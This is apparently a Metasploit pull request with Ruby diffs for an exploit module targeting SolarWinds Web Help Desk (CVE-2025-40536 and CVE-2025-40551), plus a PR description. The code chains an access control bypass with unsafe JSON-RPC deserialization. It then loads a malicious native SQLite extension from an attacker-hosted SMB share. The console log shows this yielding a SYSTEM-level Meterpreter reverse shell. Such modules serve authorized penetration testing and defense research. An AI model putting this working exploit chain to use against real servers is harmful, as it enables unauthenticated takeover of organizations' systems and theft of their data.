+    print_status('Step 2 - Login pref page...')
+
+    external_auth_container = step2_login_pref_page(session_ctx)
+
+    print_status('Step 3 - Trigger SAML object...')
+
+    step3_trigger_saml_object(session_ctx, external_auth_container)
+
+    print_status('Step 4 - Create JSON RPC bridge...')
+
+    jsonrpc_client = step4_create_jsonrpc_bridge(session_ctx)
+
+    print_status('Step 5 - Registering the org.sqlite.JDBC driver...')
+
+    # We first need to registering the org.sqlite.JDBC driver so we can use it, as it may have not already
+    # been registered. By instantiating org.sqlite.JDBC, the classes static initializer will register the driver.
+    json_data = {
+      'javaClass' => 'org.sqlite.JDBC'
+    }
+
+    step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data)
+
+    # let the driver load
+    Rex::ThreadSafe.sleep(3)
+
+    print_status('Step 6 - Loading malicious extension over SMB...')
+
+    # With the org.sqlite.JDBC driver available, we leverage com.zaxxer.hikari.HikariDataSource to create a sqlite
+    # connection. We use a sqlite in-memory database to avoid touching disk, and we leverage the enable_load_extension
+    # pragma to allow us to load arbitrary native code extensions. Hikari allows us to execute arbitrary SQL statement
+    # when a new database connection is opened. We use this to load a malicious extension that contains a Metasploit
+    # native code payload.
+    # Tested against Web Help Desk version 12.8.8.2528 running on Windows Server 2022 (NOTE: If you are using
+    # the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your
+    # own payloads).
+    json_data = {
+      'javaClass' => 'com.zaxxer.hikari.HikariDataSource',
+      'driverClassName' => 'org.sqlite.SQLiteDataSource',
+      'jdbcUrl' => 'jdbc:sqlite::memory:?enable_load_extension=true',
+      'connectionInitSql' => "SELECT load_extension('#{unc}');"
+    }
+
+    step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data, return_early: true)
+
+    cleanup_service
+  end
+
+  def step1_initial_session
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa'),
+      'headers' => {
+        'x-webobjects-recording' => '1'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Connection failed') unless res
+
+    fail_with(Failure::UnexpectedReply, "Step 1 - Unexpected response code #{res.code}") unless res.code == 200
+
+    m = res.body.match(%r{"/helpdesk/\w+/\w+\.css\?v=([\d_]+)"})
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Failed to extract version') unless m
+
+    version = m[1].gsub('_', '.')
+
+    vprint_status("Version: #{version}")
+
+    m = res.body.match(%r{src="/helpdesk/WebObjects/Helpdesk\.woa/wr\?wodata=(jar[^"]+)"})
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Failed to extract resource path') unless m
+
+    resource_path = Rex::Text.uri_decode(m[1])
+
+    # jar:file:////C:/Program%20Files/WebHelpDesk/bin/webapps/helpdesk/WEB-INF/lib/Ajax.jar!/WebServerResources/prototype.js
+    platform = resource_path =~ %r{file:////.:/} ? :windows : :unix
+
+    vprint_status("Platform: #{platform}")
+
+    cookies = res.get_cookies
+
+    jsessionid = cookies.scan(/JSESSIONID=([A-Za-z0-9]+);*/).flatten[0] || nil
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Failed to get JSESSIONID') unless jsessionid
+
+    vprint_status("JSESSIONID: #{jsessionid}")
+
+    xsrf_token = cookies.scan(/XSRF-TOKEN=([A-Za-z0-9-]+);*/).flatten[0] || nil
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Failed to get XSRF-TOKEN') unless xsrf_token
+
+    vprint_status("XSRF-TOKEN: #{xsrf_token}")
+
+    x_webobjects_session_id = res.headers['x-webobjects-session-id']&.to_s
+
+    fail_with(Failure::UnexpectedReply, 'Step 1 - Failed to get x-webobjects-session-id') unless x_webobjects_session_id
+
+    vprint_status("x-webobjects-session-id: #{x_webobjects_session_id}")
+
+    {
+      version: version,
+      platform: platform,
+      jsessionid: jsessionid,
+      xsrf_token: xsrf_token,
+      x_webobjects_session_id: x_webobjects_session_id
+    }
+  end
+
+  def step2_login_pref_page(session_ctx)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', "#{Rex::Text.rand_text_alpha(8)}.wo", session_ctx[:x_webobjects_session_id], '1.0'),
+      'headers' => {
+        'X-Xsrf-Token' => session_ctx[:xsrf_token],
+        'Cookie' => "JSESSIONID=#{session_ctx[:jsessionid]}"
+      },
+      'vars_get' => {
+        Rex::Text.rand_text_alpha(8) => '/ajax/',
+        'wopage' => 'LoginPref'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Step 2 - Connection failed') unless res
+
+    fail_with(Failure::UnexpectedReply, "Step 2 - Unexpected response code #{res.code}") unless res.code == 200
+
+    m = res.body.match(%r{id="externalAuthContainer" updateUrl="/(helpdesk/WebObjects/Helpdesk\.woa/ajax/\d+\.\d+)})
+
+    fail_with(Failure::UnexpectedReply, 'Step 2 - Failed to extract externalAuthContainer') unless m
+
+    external_auth_container = m[1]
+
+    vprint_status("externalAuthContainer: #{external_auth_container}")
+
+    external_auth_container
+  end
+
+  def step3_trigger_saml_object(session_ctx, external_auth_container)
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, external_auth_container),
+      'headers' => {
+        'X-Xsrf-Token' => session_ctx[:xsrf_token],
+        'Cookie' => "JSESSIONID=#{session_ctx[:jsessionid]}"
+      },
+      'data' => "0.7.1.3.1.0.0.0.1.1.0=1&_csrf=#{session_ctx[:xsrf_token]}"
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Step 3 - Connection failed') unless res
+
+    fail_with(Failure::UnexpectedReply, "Step 3 - Unexpected response code #{res.code}") unless res.code == 200
+  end
+
+  def step4_create_jsonrpc_bridge(session_ctx)
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', "#{Rex::Text.rand_text_alpha(8)}.wo", session_ctx[:x_webobjects_session_id], '1.0'),
+      'headers' => {
+        'X-Xsrf-Token' => session_ctx[:xsrf_token],
+        'Cookie' => "JSESSIONID=#{session_ctx[:jsessionid]}"
+      },
+      'vars_get' => {
+        Rex::Text.rand_text_alpha(8) => '/ajax/',
+        'wopage' => 'LoginPref'
+      }
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Step 4 - Connection failed') unless res
+
+    fail_with(Failure::UnexpectedReply, "Step 4 - Unexpected response code #{res.code}") unless res.code == 200
+
+    m = res.body.match(%r{JSONRpcClient\('/helpdesk/WebObjects/Helpdesk\.woa/ajax/([\d.]+)'\);})
+
+    fail_with(Failure::UnexpectedReply, 'Step 4 - Failed to extract JSONRpcClient') unless m
+
+    jsonrpc_client = m[1]
+
+    vprint_status("JSONRpcClient: #{jsonrpc_client}")
+
+    jsonrpc_client
+  end
+
+  def step5_trigger_unsafe_deserialization(session_ctx, jsonrpc_client, json_data, return_early: false)
+    random_id = rand(1..0xffff)
+    random_name = Rex::Text.rand_text_alpha(8)
+
+    # whd-core.jar!com.macsdesign.util.MDSApplication.isWhitelisted
+    allowlist = [
+      'parentpopup', 'wonoselectionstring', 'dummy', 'mdssubmitlink', 'mdsform__enterkeypressed',
+      'mdsform__shiftkeypressed', 'mdsform__altkeypressed', '_csrf'
+    ]
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', jsonrpc_client),
+      'headers' => {
+        'X-Xsrf-Token' => session_ctx[:xsrf_token],
+        'Cookie' => "JSESSIONID=#{session_ctx[:jsessionid]}"
+      },
+      'data' => {
+        Rex::Text.rand_text_alpha(8) => "java.#{allowlist.shuffle.join}",
+        'id' => random_id,
+        'method' => 'wopage.setVariableValueForName',
+        'params' => [
+          random_name,
+          json_data
+        ]
+      }.to_json
+    )
+
+    fail_with(Failure::UnexpectedReply, 'Step 5A - Connection failed') unless res
+
+    fail_with(Failure::UnexpectedReply, "Step 5A - Unexpected response code #{res.code}") unless res.code == 200
+
+    res = send_request_cgi(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', jsonrpc_client),
+      'headers' => {
+        'X-Xsrf-Token' => session_ctx[:xsrf_token],
+        'Cookie' => "JSESSIONID=#{session_ctx[:jsessionid]}"
+      },
+      'data' => {
+        Rex::Text.rand_text_alpha(8) => "java.#{allowlist.shuffle.join}",
+        'id' => random_id,
+        'method' => 'wopage.variableValueForName',
+        'params' => [random_name]
+      }.to_json
+    )
+
+    unless return_early
+      fail_with(Failure::UnexpectedReply, 'Step 5B - Connection failed') unless res
+
+      fail_with(Failure::UnexpectedReply, "Step 5B - Unexpected response code #{res.code}") unless res.code == 200
+    end
+  end
+
+end

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -39,13 +39,13 @@ class MetasploitModule < Msf::Exploit::Remote
         'DisclosureDate' => '2026-01-28',
         'Privileged' => true, # Runs as "NT AUTHORITY\SYSTEM" by default on a Windows install.
         'Platform' => ['win', 'unix', 'linux'],
-        'Arch' => [ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Arch' => [ARCH_X64, ARCH_CMD],
         'Targets' => [
           [
             'WHD 12.8.* on Windows (Native code payload)', {
               'VersionStart' => '12.8',
               'Platform' => 'win',
-              'Arch' => [ARCH_X86, ARCH_X64]
+              'Arch' => ARCH_X64 # Ships as a Java application running in a x64 java.exe process
             }
           ],
           [

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Name' => 'SolarWinds Web Help Desk unauthenticated RCE',
         'Description' => %q{
           This module exploits an access control bypass vulnerability (CVE-2025-40536) and an unsafe deserialization
-          vulnerability (CVE-2025-40551) to achieve unauthenticvate RCE againt a vulnerable SolarWinds Web Help Desk
+          vulnerability (CVE-2025-40551) to achieve unauthenticated RCE against a vulnerable SolarWinds Web Help Desk
           server.
         },
         'License' => MSF_LICENSE,
@@ -105,7 +105,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     case target['Platform']
     when 'win'
-      fail_with(Failure::BadConfig, "Remote target is runnign on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}") unless session_ctx[:platform] == :windows
+      fail_with(Failure::BadConfig, "Remote target is running on #{session_ctx[:platform]} but Metasploit target platform is #{target['Platform']}") unless session_ctx[:platform] == :windows
       # TODO: when 'linux', 'unix'
     end
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -184,7 +184,12 @@ class MetasploitModule < Msf::Exploit::Remote
     resource_path = Rex::Text.uri_decode(m[1])
 
     # jar:file:////C:/Program%20Files/WebHelpDesk/bin/webapps/helpdesk/WEB-INF/lib/Ajax.jar!/WebServerResources/prototype.js
-    platform = resource_path =~ %r{file:////.:/} ? :windows : :unix
+    # jar:file:///usr/local/webhelpdesk/bin/webapps/helpdesk/WEB-INF/lib/Ajax.jar!/WebServerResources/prototype.js
+    platform = if resource_path =~ %r{file:////.:/}
+                 :windows
+               else
+                 resource_path =~ %r{file:///Applications/} ? :mac : :linux
+               end
 
     vprint_status("Platform: #{platform}")
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -176,7 +176,9 @@ class MetasploitModule < Msf::Exploit::Remote
     # overcome this, we wrap the SMB server mixin in a new Exploit class, and instantiate it separately.
     return nil unless target['VersionStart'] == '12.8' && session_ctx[:platform] == :windows
 
-    fail_with(Failure::BadConfig, 'SMB_SRVPORT must be 445 to serve a file over SMB') unless datastore['SMB_SRVPORT'].to_i == 445
+    if Rex::Socket.is_ip_addr?(datastore['SRVHOST']) && Rex::Socket.addr_atoi(datastore['SRVHOST']) == 0
+      fail_with(Exploit::Failure::BadConfig, 'The SRVHOST option must be set to a routable IP address.')
+    end
 
     fail_with(Failure::BadConfig, 'SRVHOST must be a routable IP address') if datastore['SRVHOST'] == '0.0.0.0' || datastore['SRVHOST'] == '::'
 

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -224,7 +224,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def step2_login_pref_page(session_ctx)
     res = send_request_cgi(
-      'method' => 'GET',
+      'method' => session_ctx[:version].start_with?('12.8') ? 'GET' : 'POST',
       'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', "#{Rex::Text.rand_text_alpha(8)}.wo", session_ctx[:x_webobjects_session_id], '1.0'),
       'headers' => {
         'X-Xsrf-Token' => session_ctx[:xsrf_token],
@@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def step4_create_jsonrpc_bridge(session_ctx)
     res = send_request_cgi(
-      'method' => 'GET',
+      'method' => session_ctx[:version].start_with?('12.8') ? 'GET' : 'POST',
       'uri' => normalize_uri(target_uri.path, 'helpdesk', 'WebObjects', 'Helpdesk.woa', 'wo', "#{Rex::Text.rand_text_alpha(8)}.wo", session_ctx[:x_webobjects_session_id], '1.0'),
       'headers' => {
         'X-Xsrf-Token' => session_ctx[:xsrf_token],

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -182,7 +182,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     smb_service = SimpleSMBShareWrapper.new
 
-    smb_service.datastore['SSRVPORT'] = datastore['SMB_SRVPORT']
+    smb_service.datastore['SRVPORT'] = datastore['SMB_SRVPORT']
     smb_service.datastore['SRVHOST'] = datastore['SRVHOST']
 
     smb_service.setup

--- a/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
+++ b/modules/exploits/multi/http/solarwinds_webhelpdesk_rce.rb
@@ -65,7 +65,8 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'Base path', '/'])
     ])
 
-    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE', 'FOLDER_NAME')
+    # We generate these automatically, so deregister then here.
+    deregister_options('SHARE', 'FILE_NAME', 'FOLDER_NAME')
   end
 
   def check


### PR DESCRIPTION
## Overview
This is a (draft) pull request to add an exploit module for the SolarWinds Web Help Desk vulnerabilities CVE-2025-40536 and CVE-2025-40551.

The module is based off the Nuclei template by [horizon3.ai](https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/), except I have added a custom gadget to achieve RCE on Windows targets.

## To-Do
- [x] Add a Linux target. Likely needing an alternative gadget. We can leverage the SQLite technique for a dirty file write which will likely let us drop a cron job for RCE.
- [x] Documentation

## Example

_NOTE: If you are using the default Metasploit payloads you will have to disable Defender while testing, alternatively bring your own payloads._

_NOTE: You need to run MSF as root so you can bind to a low port (445 for the SMB server). Also, open your firewall for ingress connections._

```
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > show options 

Module options (exploit/multi/http/solarwinds_webhelpdesk_rce):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   JOHNPWFILE                   no        Name of file to store JohnTheRipper hashes in. Supports NTLMv1 and NTLMv2 hashes, each of which is stored in separate files. Can al
                                          so be a path.
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: http, sapni, socks4, socks5, socks5h
   RHOSTS      192.168.86.146   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT       8443             yes       The target port (TCP)
   SRVHOST     192.168.86.122   yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresse
                                          s.
   SRVPORT     445              yes       The local port to listen on.
   SSL         true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       Base path
   VHOST                        no        HTTP server virtual host


Payload options (windows/x64/meterpreter_reverse_tcp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   EXITFUNC    process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   EXTENSIONS                   no        Comma-separate list of extensions to load
   EXTINIT                      no        Initialization strings for extensions
   LHOST       eth0             yes       The listen address (an interface may be specified)
   LPORT       4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows (Native code dropper)



View the full module info with the info, or info -d command.

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[*] 192.168.86.146:8443 - Cannot reliably check exploitability. Step 1 - Connection failed
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > check
[+] 192.168.86.146:8443 - The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > exploit 
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
msf exploit(multi/http/solarwinds_webhelpdesk_rce) > [+] The target is vulnerable. Detected Web Help Desk version 12.8.8.2528 (windows).
[*] Step 0 - Starting SMB service...
[*] Server is running. Listening on 192.168.86.122:445
[*] Server started.
[*] Malicious SQLite extension UNC: \\192.168.86.122\iBfAAI\OWxxD.dll
[*] Step 1 - Initial session...
[*] Step 2 - Login pref page...
[*] Step 3 - Trigger SAML object...
[*] Step 4 - Create JSON RPC bridge...
[*] Step 5 - Registering the org.sqlite.JDBC driver...
[*] Step 6 - Loading malicious extension over SMB...
[*] Meterpreter session 2 opened (192.168.86.122:4444 -> 192.168.86.146:53030) at 2026-01-30 22:04:02 +0000

msf exploit(multi/http/solarwinds_webhelpdesk_rce) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-V28QNSO2H05
OS              : Windows Server 2022 (10.0 Build 20348).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter > pwd
C:\Program Files\WebHelpDesk\bin\webapps\helpdesk
meterpreter > 
```